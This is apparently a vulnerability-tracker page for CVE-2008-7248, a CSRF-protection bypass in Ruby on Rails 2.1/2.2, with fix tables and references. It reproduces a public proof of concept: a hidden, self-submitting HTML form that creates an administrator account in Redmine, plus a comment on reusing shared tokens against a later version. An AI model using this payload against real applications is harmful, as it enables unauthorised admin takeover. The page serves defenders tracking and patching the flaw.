CVE-2008-7248
unknown
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
1.0
Description
Ruby on Rails 2.1 before 2.1.3 and 2.2.x before 2.2.2 does not verify tokens for requests with certain content types, which allows remote attackers to bypass cross-site request forgery (CSRF) protection for requests to applications that rely on this protection, as demonstrated using text/plain.
Predictions
Exploit likelihood
55%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Ruby on Rails 2.3.5 - 'protect_from_forgery' Cross-Site Request Forgery
source: https://www.securityfocus.com/bid/37322/info
Ruby on Rails is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
/**
* Redmine <= 0.8.6 CSRF Add Admin User Exploit
* Discovered by: p0deje (http://p0deje.blogspot.com)
* Application: http://www.redmine.org/wiki/redmine/Download
* SA: http://www.redmine.org/news/30
* Date: 13.11.2009
* Versions affected: <= 0.8.6
* Description: this is a simple exploit which exploits CSRF vulnerability in Redmine, it creates user account with adminstartive rights
*/
<html>
<body>
<form method=POST action="http://www.example.com/users/new">
<input style="display: none" type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
<input style="display: none" type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
<input style="display: none" type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
<input style="display: none" type="text" value="hacker@hacker.com" size="30" name="user[mail]" id="user_mail"/>
<input style="display: none" type="password" size="25" name="password" id="password" value="hacker" />
<input style="display: none" type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
<input style="display: none" type="checkbox" value="1" name="user[admin]" id="user_admin"/>
<input style="display: none" type="hidden" value="1" name="user[admin]"/>
<input style="display: none" type="submit" value="Create" id="commit" name="commit" />
</form>
<script>document.getElementById("commit").click();</script>
</body>
</html>
/**
* P.S. Actually, this vulnerability wasn't fixed in Redmine 0.8.7, because token was generated one time for all the pages and allthe users.
* Thus, you can add POST data with token of any user and exploit will be working again
*/OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 2.2.3-1 |
| sid | Fixed | 2.2.3-1 |
| forky | Fixed | 2.2.3-1 |
| bullseye | Fixed | 2.2.3-1 |
| bookworm | Fixed | 2.2.3-1 |
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| RubyGems | actionpack | !< 2.1.0||<~> 2.1.3 | ~> 2.1.3 |
| RubyGems | actionpack | >=2.1.0,<2.1.3 | 2.1.3 |
| RubyGems | actionpack | >=2.2.0,<2.2.2 | 2.2.2 |
References
- https://weblog.rubyonrails.org/2008/11/18/potential-circumvention-of-csrf-protection-in-rails-2-1
- https://nvd.nist.gov/vuln/detail/CVE-2008-7248
- https://github.com/rails/rails/commit/099a98e9b7108dae3e0f78b207e0a7dc5913bd1a
- https://access.redhat.com/security/cve/CVE-2008-7248
- https://bugzilla.redhat.com/show_bug.cgi?id=544329
- https://github.com/rails/rails
- https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2008-7248.yml
- https://groups.google.com/group/rubyonrails-security/browse_thread/thread/d741ee286e36e301?hl=en
- https://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html
- https://pseudo-flaw.net/content/web-browsers/form-data-encoding-roundup
- https://web.archive.org/web/20090906010200/https://www.vupen.com/english/advisories/2009/2544
- https://www.openwall.com/lists/oss-security/2009/11/28/1
- https://www.openwall.com/lists/oss-security/2009/12/02/2
- https://www.rorsecurity.info/journal/2008/11/19/circumvent-rails-csrf-protection.html
- http://groups.google.com/group/rubyonrails-security/browse_thread/thread/d741ee286e36e301?hl=en
- http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00004.html
- http://pseudo-flaw.net/content/web-browsers/form-data-encoding-roundup
- http://weblog.rubyonrails.org/2008/11/18/potential-circumvention-of-csrf-protection-in-rails-2-1
- http://www.openwall.com/lists/oss-security/2009/11/28/1
- http://www.openwall.com/lists/oss-security/2009/12/02/2
- https://security-tracker.debian.org/tracker/CVE-2008-7248
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.